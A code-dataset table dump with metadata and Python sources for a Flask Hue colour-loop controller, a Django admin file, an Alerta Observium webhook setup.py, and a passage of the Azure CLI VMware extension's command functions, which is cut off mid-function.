hexsha
stringlengths 40
40
| size
int64 7
1.04M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
247
| max_stars_repo_name
stringlengths 4
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
368k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
247
| max_issues_repo_name
stringlengths 4
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
247
| max_forks_repo_name
stringlengths 4
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.04M
| avg_line_length
float64 1.77
618k
| max_line_length
int64 1
1.02M
| alphanum_fraction
float64 0
1
| original_content
stringlengths 7
1.04M
| filtered:remove_function_no_docstring
int64 -102
942k
| filtered:remove_class_no_docstring
int64 -354
977k
| filtered:remove_delete_markers
int64 0
60.1k
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
80bde51cbf5dacd747cbe696168d2b9360cef562
| 1,337
|
py
|
Python
|
Build Docker/code/main.py
|
AlexTheGeek/color-loop-hue
|
67266628c72cb48e6397596e1f98b46d8674f669
|
[
"MIT"
] | 2
|
2021-01-01T10:40:26.000Z
|
2021-02-20T09:39:22.000Z
|
Build Docker/code/main.py
|
AlexTheGeek/color-loop-hue
|
67266628c72cb48e6397596e1f98b46d8674f669
|
[
"MIT"
] | null | null | null |
Build Docker/code/main.py
|
AlexTheGeek/color-loop-hue
|
67266628c72cb48e6397596e1f98b46d8674f669
|
[
"MIT"
] | null | null | null |
#!/bin/python3
#Alexis Brunet alias AlexTheGeek
####################
## HUE COLOR LOOP ##
####################
import time
import os
import requests
from os.path import join, dirname
from dotenv import load_dotenv
from flask import Flask, render_template, request
app = Flask(__name__)
STARTING = '{"on":true,"bri":254,"xy":[0.3523,0.144],"effect":"colorloop"}'
ENDING = '{"effect": "none"}'
OFF = '{"on":false}'
env_path = join(dirname(__file__), 'env')
load_dotenv(env_path)
ip = os.getenv('IP')
api = os.getenv('API')
group = os.getenv('GROUP')
@app.route("/<deviceName>/")
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8080)
| 27.854167
| 87
| 0.598355
|
#!/bin/python3
#Alexis Brunet alias AlexTheGeek
####################
## HUE COLOR LOOP ##
####################
import time
import os
import requests
from os.path import join, dirname
from dotenv import load_dotenv
from flask import Flask, render_template, request
app = Flask(__name__)
STARTING = '{"on":true,"bri":254,"xy":[0.3523,0.144],"effect":"colorloop"}'
ENDING = '{"effect": "none"}'
OFF = '{"on":false}'
env_path = join(dirname(__file__), 'env')
load_dotenv(env_path)
ip = os.getenv('IP')
api = os.getenv('API')
group = os.getenv('GROUP')
def appel(data, grp):
headers = {'Content-Type': 'application/json', }
response = requests.put(
'http://'+ip+'/api/'+api+'/groups/'+grp+'/action/', headers=headers, data=data)
@app.route("/<deviceName>/")
def action(deviceName):
if deviceName != 'monstermash':
if deviceName == 'start':
appel(STARTING, group)
return '<h1>Color Loop START</h1>', {'Content-Type': 'text/html'}
if deviceName == 'stop':
appel(ENDING, group)
return '<h1>Color Loop STOP</h1>', {'Content-Type': 'text/html'}
if deviceName == 'off':
appel(OFF, group)
return '<h1>Color Loop TURN OFF</h1>', {'Content-Type': 'text/html'}
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8080)
| 641
| 0
| 45
|
4e6123c1786b27aaf1d63c5382e320ef1dfeaffe
| 381
|
py
|
Python
|
django_extauth/admin.py
|
aiakos/aiakos
|
a591e7ef13ab9e8e14b4d3569d43fce694c4150a
|
[
"BSD-2-Clause",
"MIT"
] | 4
|
2017-04-28T19:09:17.000Z
|
2018-07-03T04:43:54.000Z
|
django_extauth/admin.py
|
aiakos/aiakos
|
a591e7ef13ab9e8e14b4d3569d43fce694c4150a
|
[
"BSD-2-Clause",
"MIT"
] | 2
|
2020-06-05T17:46:47.000Z
|
2021-06-10T17:22:58.000Z
|
django_extauth/admin.py
|
aiakos/aiakos
|
a591e7ef13ab9e8e14b4d3569d43fce694c4150a
|
[
"BSD-2-Clause",
"MIT"
] | 2
|
2017-08-14T07:15:14.000Z
|
2019-03-04T14:02:05.000Z
|
from django.contrib import admin
from .models import *
admin.site.register(IdentityProvider, IdentityProviderAdmin)
admin.site.register(ExternalIdentity, ExternalIdentityAdmin)
| 25.4
| 60
| 0.787402
|
from django.contrib import admin
from .models import *
class IdentityProviderAdmin(admin.ModelAdmin):
list_display = ('domain', 'name', 'client_id', 'protocol')
admin.site.register(IdentityProvider, IdentityProviderAdmin)
class ExternalIdentityAdmin(admin.ModelAdmin):
list_display = ('user', 'provider', 'sub')
admin.site.register(ExternalIdentity, ExternalIdentityAdmin)
| 0
| 154
| 46
|
cc3464107c1563f46ae7232b9d85ad3af834a0f0
| 625
|
py
|
Python
|
webhooks/observium/setup.py
|
x3me/alerta-contrib
|
215bf1cffa6362a90edb6350a6dea37db6b18ab8
|
[
"MIT"
] | null | null | null |
webhooks/observium/setup.py
|
x3me/alerta-contrib
|
215bf1cffa6362a90edb6350a6dea37db6b18ab8
|
[
"MIT"
] | null | null | null |
webhooks/observium/setup.py
|
x3me/alerta-contrib
|
215bf1cffa6362a90edb6350a6dea37db6b18ab8
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
version = '0.0.5'
setup(
name="alerta-observium",
version=version,
description='Alerta webhook for Obseervium NMS',
url='https://github.com/alerta/alerta-contrib',
license='MIT',
author='Iskren Hadzhinedev',
author_email='iskren.hadzhinedev@x3me.net',
packages=find_packages(),
py_modules=['alerta_observium'],
install_requires=[
'python-dateutil'
],
include_package_data=True,
zip_safe=True,
entry_points={
'alerta.webhooks': [
'observium = alerta_observium:ObserviumWebhook'
]
}
)
| 24.038462
| 59
| 0.6576
|
from setuptools import setup, find_packages
version = '0.0.5'
setup(
name="alerta-observium",
version=version,
description='Alerta webhook for Obseervium NMS',
url='https://github.com/alerta/alerta-contrib',
license='MIT',
author='Iskren Hadzhinedev',
author_email='iskren.hadzhinedev@x3me.net',
packages=find_packages(),
py_modules=['alerta_observium'],
install_requires=[
'python-dateutil'
],
include_package_data=True,
zip_safe=True,
entry_points={
'alerta.webhooks': [
'observium = alerta_observium:ObserviumWebhook'
]
}
)
| 0
| 0
| 0
|
db99afef5980354d5007694954a2c0c2e199a476
| 45,026
|
py
|
Python
|
src/vmware/azext_vmware/custom.py
|
Mossaka/azure-cli-extensions
|
f75f5d39d3b621fcbcdd50eddf378f3a49535ab0
|
[
"MIT"
] | null | null | null |
src/vmware/azext_vmware/custom.py
|
Mossaka/azure-cli-extensions
|
f75f5d39d3b621fcbcdd50eddf378f3a49535ab0
|
[
"MIT"
] | null | null | null |
src/vmware/azext_vmware/custom.py
|
Mossaka/azure-cli-extensions
|
f75f5d39d3b621fcbcdd50eddf378f3a49535ab0
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
from typing import List, Tuple
from azext_vmware.vendored_sdks.avs_client import AVSClient
LEGAL_TERMS = '''
LEGAL TERMS
Azure VMware Solution ("AVS") is an Azure Service licensed to you as part of your Azure subscription and subject to the terms and conditions of the agreement under which you obtained your Azure subscription (https://azure.microsoft.com/support/legal/). The following additional terms also apply to your use of AVS:
DATA RETENTION. AVS does not currently support retention or extraction of data stored in AVS Clusters. Once an AVS Cluster is deleted, the data cannot be recovered as it terminates all running workloads, components, and destroys all Cluster data and configuration settings, including public IP addresses.
PROFESSIONAL SERVICES DATA TRANSFER TO VMWARE. In the event that you contact Microsoft for technical support relating to Azure VMware Solution and Microsoft must engage VMware for assistance with the issue, Microsoft will transfer the Professional Services Data and the Personal Data contained in the support case to VMware. The transfer is made subject to the terms of the Support Transfer Agreement between VMware and Microsoft, which establishes Microsoft and VMware as independent processors of the Professional Services Data. Before any transfer of Professional Services Data to VMware will occur, Microsoft will obtain and record consent from you for the transfer.
VMWARE DATA PROCESSING AGREEMENT. Once Professional Services Data is transferred to VMware (pursuant to the above section), the processing of Professional Services Data, including the Personal Data contained the support case, by VMware as an independent processor will be governed by the VMware Data Processing Agreement for Microsoft AVS Customers Transferred for L3 Support (the "VMware Data Processing Agreement") between you and VMware (located at https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/privacy/vmware-data-processing-agreement.pdf). You also give authorization to allow your representative(s) who request technical support for Azure VMware Solution to provide consent on your behalf to Microsoft for the transfer of the Professional Services Data to VMware.
ACCEPTANCE OF LEGAL TERMS. By continuing, you agree to the above additional Legal Terms for AVS. If you are an individual accepting these terms on behalf of an entity, you also represent that you have the legal authority to enter into these additional terms on that entity's behalf.
'''
| 71.469841
| 789
| 0.848043
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
from typing import List, Tuple
from azext_vmware.vendored_sdks.avs_client import AVSClient
LEGAL_TERMS = '''
LEGAL TERMS
Azure VMware Solution ("AVS") is an Azure Service licensed to you as part of your Azure subscription and subject to the terms and conditions of the agreement under which you obtained your Azure subscription (https://azure.microsoft.com/support/legal/). The following additional terms also apply to your use of AVS:
DATA RETENTION. AVS does not currently support retention or extraction of data stored in AVS Clusters. Once an AVS Cluster is deleted, the data cannot be recovered as it terminates all running workloads, components, and destroys all Cluster data and configuration settings, including public IP addresses.
PROFESSIONAL SERVICES DATA TRANSFER TO VMWARE. In the event that you contact Microsoft for technical support relating to Azure VMware Solution and Microsoft must engage VMware for assistance with the issue, Microsoft will transfer the Professional Services Data and the Personal Data contained in the support case to VMware. The transfer is made subject to the terms of the Support Transfer Agreement between VMware and Microsoft, which establishes Microsoft and VMware as independent processors of the Professional Services Data. Before any transfer of Professional Services Data to VMware will occur, Microsoft will obtain and record consent from you for the transfer.
VMWARE DATA PROCESSING AGREEMENT. Once Professional Services Data is transferred to VMware (pursuant to the above section), the processing of Professional Services Data, including the Personal Data contained the support case, by VMware as an independent processor will be governed by the VMware Data Processing Agreement for Microsoft AVS Customers Transferred for L3 Support (the "VMware Data Processing Agreement") between you and VMware (located at https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/privacy/vmware-data-processing-agreement.pdf). You also give authorization to allow your representative(s) who request technical support for Azure VMware Solution to provide consent on your behalf to Microsoft for the transfer of the Professional Services Data to VMware.
ACCEPTANCE OF LEGAL TERMS. By continuing, you agree to the above additional Legal Terms for AVS. If you are an individual accepting these terms on behalf of an entity, you also represent that you have the legal authority to enter into these additional terms on that entity's behalf.
'''
def privatecloud_list(client: AVSClient, resource_group_name=None):
if resource_group_name is None:
return client.private_clouds.list_in_subscription()
return client.private_clouds.list(resource_group_name)
def privatecloud_show(client: AVSClient, resource_group_name, name):
return client.private_clouds.get(resource_group_name, name)
def privatecloud_create(client: AVSClient, resource_group_name, name, sku, cluster_size, network_block, location=None, internet=None, vcenter_password=None, nsxt_password=None, tags=None, accept_eula=False, mi_system_assigned=False):
from knack.prompting import prompt_y_n
if not accept_eula:
print(LEGAL_TERMS)
msg = 'Do you agree to the above additional terms for AVS?'
if not prompt_y_n(msg, default="n"):
return None
from azext_vmware.vendored_sdks.avs_client.models import PrivateCloud, Circuit, ManagementCluster, Sku, PrivateCloudIdentity
cloud = PrivateCloud(sku=Sku(name=sku), ciruit=Circuit(), management_cluster=ManagementCluster(cluster_size=cluster_size), network_block=network_block)
if location is not None:
cloud.location = location
if tags is not None:
cloud.tags = tags
if mi_system_assigned:
cloud.identity = PrivateCloudIdentity(type='SystemAssigned')
if internet is not None:
cloud.internet = internet
if vcenter_password is not None:
cloud.vcenter_password = vcenter_password
if nsxt_password is not None:
cloud.nsxt_password = nsxt_password
return client.private_clouds.begin_create_or_update(resource_group_name, name, cloud)
def privatecloud_update(client: AVSClient, resource_group_name, name, cluster_size=None, internet=None, tags=None):
from azext_vmware.vendored_sdks.avs_client.models import PrivateCloudUpdate, ManagementCluster
private_cloud_update = PrivateCloudUpdate()
if tags is not None:
private_cloud_update.tags = tags
if cluster_size is not None:
private_cloud_update.management_cluster = ManagementCluster(cluster_size=cluster_size)
if internet is not None:
private_cloud_update.internet = internet
return client.private_clouds.begin_update(resource_group_name, name, private_cloud_update)
def privatecloud_delete(client: AVSClient, resource_group_name, name, yes=False):
from knack.prompting import prompt_y_n
msg = 'This will delete the private cloud. Are you sure?'
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.private_clouds.begin_delete(resource_group_name, name)
def privatecloud_listadmincredentials(client: AVSClient, resource_group_name, private_cloud):
return client.private_clouds.list_admin_credentials(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def privatecloud_addidentitysource(client: AVSClient, resource_group_name, name, private_cloud, alias, domain, base_user_dn, base_group_dn, primary_server, username, password, secondary_server=None, ssl="Disabled"):
from azext_vmware.vendored_sdks.avs_client.models import IdentitySource
pc = client.private_clouds.get(resource_group_name, private_cloud)
identitysource = IdentitySource(name=name, alias=alias, domain=domain, base_user_dn=base_user_dn, base_group_dn=base_group_dn, primary_server=primary_server, ssl=ssl, username=username, password=password)
if secondary_server is not None:
identitysource.secondary_server = secondary_server
pc.identity_sources.append(identitysource)
return client.private_clouds.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud=pc)
def privatecloud_deleteidentitysource(client: AVSClient, resource_group_name, name, private_cloud, alias, domain):
pc = client.private_clouds.get(resource_group_name, private_cloud)
found = next((ids for ids in pc.identity_sources
if ids.name == name and ids.alias == alias and ids.domain == domain), None)
if found:
pc.identity_sources.remove(found)
return client.private_clouds.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud=pc)
return pc
def privatecloud_addavailabilityzone(client: AVSClient, resource_group_name, private_cloud, strategy=None, zone=None, secondary_zone=None):
from azext_vmware.vendored_sdks.avs_client.models import AvailabilityProperties, PrivateCloudUpdate
pc = PrivateCloudUpdate()
pc.availability = AvailabilityProperties(strategy=strategy, zone=zone, secondary_zone=secondary_zone)
return client.private_clouds.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud_update=pc)
def privatecloud_deleteavailabilityzone(client: AVSClient, resource_group_name, private_cloud):
from azext_vmware.vendored_sdks.avs_client.models import PrivateCloudUpdate
pc = PrivateCloudUpdate()
pc.availability = None
return client.private_clouds.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud_update=pc)
def privatecloud_addcmkencryption(client: AVSClient, resource_group_name, private_cloud, enc_status=None, enc_kv_key_name=None, enc_kv_key_version=None, enc_kv_url=None):
from azext_vmware.vendored_sdks.avs_client.models import Encryption, EncryptionKeyVaultProperties, PrivateCloudUpdate
pc = PrivateCloudUpdate()
pc.encryption = Encryption(status=enc_status, key_vault_properties=EncryptionKeyVaultProperties(key_name=enc_kv_key_name, key_version=enc_kv_key_version, key_vault_url=enc_kv_url))
return client.private_clouds.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud_update=pc)
def privatecloud_deletecmkenryption(client: AVSClient, resource_group_name, private_cloud):
from azext_vmware.vendored_sdks.avs_client.models import PrivateCloudUpdate
pc = PrivateCloudUpdate()
pc.encryption = None
return client.private_clouds.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud_update=pc)
def privatecloud_identity_assign(client: AVSClient, resource_group_name, private_cloud, system_assigned=False):
from azext_vmware.vendored_sdks.avs_client.models import PrivateCloudIdentity, PrivateCloudUpdate
pc = PrivateCloudUpdate()
if system_assigned:
pc.identity = PrivateCloudIdentity(type="SystemAssigned")
return client.private_clouds.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud_update=pc)
def privatecloud_identity_remove(client: AVSClient, resource_group_name, private_cloud):
from azext_vmware.vendored_sdks.avs_client.models import PrivateCloudIdentity, PrivateCloudUpdate
pc = PrivateCloudUpdate()
pc.identity = PrivateCloudIdentity(type=None)
return client.private_clouds.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud_update=pc)
def privatecloud_identity_get(client: AVSClient, resource_group_name, private_cloud):
return client.private_clouds.get(resource_group_name, private_cloud).identity
def privatecloud_rotate_vcenter_password(client: AVSClient, resource_group_name, private_cloud):
return client.private_clouds.begin_rotate_vcenter_password(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def privatecloud_rotate_nsxt_password(client: AVSClient, resource_group_name, private_cloud):
return client.private_clouds.begin_rotate_nsxt_password(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def cluster_create(client: AVSClient, resource_group_name, name, sku, private_cloud, size, hosts):
from azext_vmware.vendored_sdks.avs_client.models import Sku, Cluster
return client.clusters.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=name, cluster=Cluster(sku=Sku(name=sku), cluster_size=size, hosts=hosts))
def cluster_update(client: AVSClient, resource_group_name, name, private_cloud, size=None, hosts=None):
return client.clusters.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=name, cluster_size=size, hosts=hosts)
def cluster_list(client: AVSClient, resource_group_name, private_cloud):
return client.clusters.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def cluster_show(client: AVSClient, resource_group_name, private_cloud, name):
return client.clusters.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=name)
def cluster_delete(client: AVSClient, resource_group_name, private_cloud, name):
return client.clusters.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=name)
def check_quota_availability(client: AVSClient, location):
return client.locations.check_quota_availability(location)
def check_trial_availability(client: AVSClient, location):
return client.locations.check_trial_availability(location)
def authorization_create(client: AVSClient, resource_group_name, private_cloud, name):
return client.authorizations.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, authorization_name=name)
def authorization_list(client: AVSClient, resource_group_name, private_cloud):
return client.authorizations.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def authorization_show(client: AVSClient, resource_group_name, private_cloud, name):
return client.authorizations.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, authorization_name=name)
def authorization_delete(client: AVSClient, resource_group_name, private_cloud, name):
return client.authorizations.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, authorization_name=name)
def hcxenterprisesite_create(client: AVSClient, resource_group_name, private_cloud, name):
return client.hcx_enterprise_sites.create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, hcx_enterprise_site_name=name)
def hcxenterprisesite_list(client: AVSClient, resource_group_name, private_cloud):
return client.hcx_enterprise_sites.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def hcxenterprisesite_show(client: AVSClient, resource_group_name, private_cloud, name):
return client.hcx_enterprise_sites.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, hcx_enterprise_site_name=name)
def hcxenterprisesite_delete(client: AVSClient, resource_group_name, private_cloud, name):
return client.hcx_enterprise_sites.delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, hcx_enterprise_site_name=name)
def datastore_create():
print('Please use "az vmware datastore netapp-volume create" or "az vmware datastore disk-pool-volume create" instead.')
def datastore_netappvolume_create(client: AVSClient, resource_group_name, private_cloud, cluster, name, volume_id):
from azext_vmware.vendored_sdks.avs_client.models import NetAppVolume
net_app_volume = NetAppVolume(id=volume_id)
return client.datastores.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster, datastore_name=name, net_app_volume=net_app_volume, disk_pool_volume=None)
def datastore_diskpoolvolume_create(client: AVSClient, resource_group_name, private_cloud, cluster, name, target_id, lun_name, mount_option="MOUNT", path=None):
from azext_vmware.vendored_sdks.avs_client.models import DiskPoolVolume
disk_pool_volume = DiskPoolVolume(target_id=target_id, lun_name=lun_name, mount_option=mount_option, path=path)
return client.datastores.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster, datastore_name=name, net_app_volume=None, disk_pool_volume=disk_pool_volume)
def datastore_list(client: AVSClient, resource_group_name, private_cloud, cluster):
return client.datastores.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster)
def datastore_show(client: AVSClient, resource_group_name, private_cloud, cluster, name):
return client.datastores.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster, datastore_name=name)
def datastore_delete(client: AVSClient, resource_group_name, private_cloud, cluster, name):
return client.datastores.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster, datastore_name=name)
def addon_list(client: AVSClient, resource_group_name, private_cloud):
return client.addons.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def addon_vr_create(client: AVSClient, resource_group_name, private_cloud, vrs_count: int):
from azext_vmware.vendored_sdks.avs_client.models import AddonVrProperties
properties = AddonVrProperties(vrs_count=vrs_count)
return client.addons.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="vr", properties=properties)
def addon_hcx_create(client: AVSClient, resource_group_name, private_cloud, offer: str):
from azext_vmware.vendored_sdks.avs_client.models import AddonHcxProperties
properties = AddonHcxProperties(offer=offer)
return client.addons.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="hcx", properties=properties)
def addon_srm_create(client: AVSClient, resource_group_name, private_cloud, license_key: str):
from azext_vmware.vendored_sdks.avs_client.models import AddonSrmProperties
properties = AddonSrmProperties(license_key=license_key)
return client.addons.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="srm", properties=properties)
def addon_vr_show(client: AVSClient, resource_group_name, private_cloud):
return client.addons.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="vr")
def addon_hcx_show(client: AVSClient, resource_group_name, private_cloud):
return client.addons.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="hcx")
def addon_srm_show(client: AVSClient, resource_group_name, private_cloud):
return client.addons.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="srm")
def addon_vr_update(client: AVSClient, resource_group_name, private_cloud, vrs_count: int):
from azext_vmware.vendored_sdks.avs_client.models import AddonVrProperties
properties = AddonVrProperties(vrs_count=vrs_count)
return client.addons.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="vr", properties=properties)
def addon_hcx_update(client: AVSClient, resource_group_name, private_cloud, offer: str):
from azext_vmware.vendored_sdks.avs_client.models import AddonHcxProperties
properties = AddonHcxProperties(offer=offer)
return client.addons.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="hcx", properties=properties)
def addon_srm_update(client: AVSClient, resource_group_name, private_cloud, license_key: str):
from azext_vmware.vendored_sdks.avs_client.models import AddonSrmProperties
properties = AddonSrmProperties(license_key=license_key)
return client.addons.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="srm", properties=properties)
def addon_vr_delete(client: AVSClient, resource_group_name, private_cloud):
return client.addons.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="vr")
def addon_hcx_delete(client: AVSClient, resource_group_name, private_cloud):
return client.addons.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="hcx")
def addon_srm_delete(client: AVSClient, resource_group_name, private_cloud):
return client.addons.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="srm")
def globalreachconnection_create(client: AVSClient, resource_group_name, private_cloud, name, authorization_key=None, peer_express_route_circuit=None, express_route_id=None):
from azext_vmware.vendored_sdks.avs_client.models import GlobalReachConnection
return client.global_reach_connections.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, global_reach_connection_name=name, global_reach_connection=GlobalReachConnection(authorization_key=authorization_key, peer_express_route_circuit=peer_express_route_circuit, express_route_id=express_route_id))
def globalreachconnection_list(client: AVSClient, resource_group_name, private_cloud):
return client.global_reach_connections.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def globalreachconnection_show(client: AVSClient, resource_group_name, private_cloud, name):
return client.global_reach_connections.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, global_reach_connection_name=name)
def globalreachconnection_delete(client: AVSClient, resource_group_name, private_cloud, name):
return client.global_reach_connections.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, global_reach_connection_name=name)
def cloud_link_create(client: AVSClient, resource_group_name, name, private_cloud, linked_cloud):
return client.cloud_links.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cloud_link_name=name, linked_cloud=linked_cloud)
def cloud_link_list(client: AVSClient, resource_group_name, private_cloud):
return client.cloud_links.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def cloud_link_show(client: AVSClient, resource_group_name, private_cloud, name):
return client.cloud_links.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cloud_link_name=name)
def cloud_link_delete(client: AVSClient, resource_group_name, private_cloud, name):
return client.cloud_links.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cloud_link_name=name)
def script_cmdlet_list(client: AVSClient, resource_group_name, private_cloud, script_package):
return client.script_cmdlets.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud, script_package_name=script_package)
def script_cmdlet_show(client: AVSClient, resource_group_name, private_cloud, script_package, name):
return client.script_cmdlets.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, script_package_name=script_package, script_cmdlet_name=name)
def script_package_list(client: AVSClient, resource_group_name, private_cloud):
return client.script_packages.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def script_package_show(client: AVSClient, resource_group_name, private_cloud, name):
return client.script_packages.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, script_package_name=name)
def script_execution_create(client: AVSClient, resource_group_name, private_cloud, name, timeout, script_cmdlet_id=None, parameters=None, hidden_parameters=None, failure_reason=None, retention=None, out=None, named_outputs: List[Tuple[str, str]] = None):
from azext_vmware.vendored_sdks.avs_client.models import ScriptExecution
if named_outputs is not None:
named_outputs = dict(named_outputs)
script_execution = ScriptExecution(timeout=timeout, script_cmdlet_id=script_cmdlet_id, parameters=parameters, hidden_parameters=hidden_parameters, failure_reason=failure_reason, retention=retention, output=out, named_outputs=named_outputs)
return client.script_executions.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, script_execution_name=name, script_execution=script_execution)
def script_execution_list(client: AVSClient, resource_group_name, private_cloud):
return client.script_executions.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def script_execution_show(client: AVSClient, resource_group_name, private_cloud, name):
return client.script_executions.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, script_execution_name=name)
def script_execution_delete(client: AVSClient, resource_group_name, private_cloud, name):
return client.script_executions.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, script_execution_name=name)
def script_execution_logs(client: AVSClient, resource_group_name, private_cloud, name):
return client.script_executions.get_execution_logs(resource_group_name=resource_group_name, private_cloud_name=private_cloud, script_execution_name=name)
def workload_network_dhcp_server_create(client: AVSClient, resource_group_name, private_cloud, dhcp: str, display_name=None, revision=None, server_address=None, lease_time=None):
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDhcpServer
properties = WorkloadNetworkDhcpServer(display_name=display_name, revision=revision, server_address=server_address, lease_time=lease_time)
return client.workload_networks.begin_create_dhcp(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dhcp_id=dhcp, properties=properties)
def workload_network_dhcp_relay_create(client: AVSClient, resource_group_name, private_cloud, dhcp: str, display_name=None, revision=None, server_addresses=None):
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDhcpRelay
properties = WorkloadNetworkDhcpRelay(display_name=display_name, revision=revision, server_addresses=server_addresses)
return client.workload_networks.begin_create_dhcp(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dhcp_id=dhcp, properties=properties)
def workload_network_dhcp_server_update(client: AVSClient, resource_group_name, private_cloud, dhcp: str, display_name=None, revision=None, server_address=None, lease_time=None):
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDhcpServer
properties = WorkloadNetworkDhcpServer(display_name=display_name, revision=revision, server_address=server_address, lease_time=lease_time)
return client.workload_networks.begin_update_dhcp(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dhcp_id=dhcp, properties=properties)
def workload_network_dhcp_relay_update(client: AVSClient, resource_group_name, private_cloud, dhcp: str, display_name=None, revision=None, server_addresses=None):
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDhcpRelay
properties = WorkloadNetworkDhcpRelay(display_name=display_name, revision=revision, server_addresses=server_addresses)
return client.workload_networks.begin_update_dhcp(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dhcp_id=dhcp, properties=properties)
def workload_network_dhcp_delete(client: AVSClient, resource_group_name, private_cloud, dhcp: str):
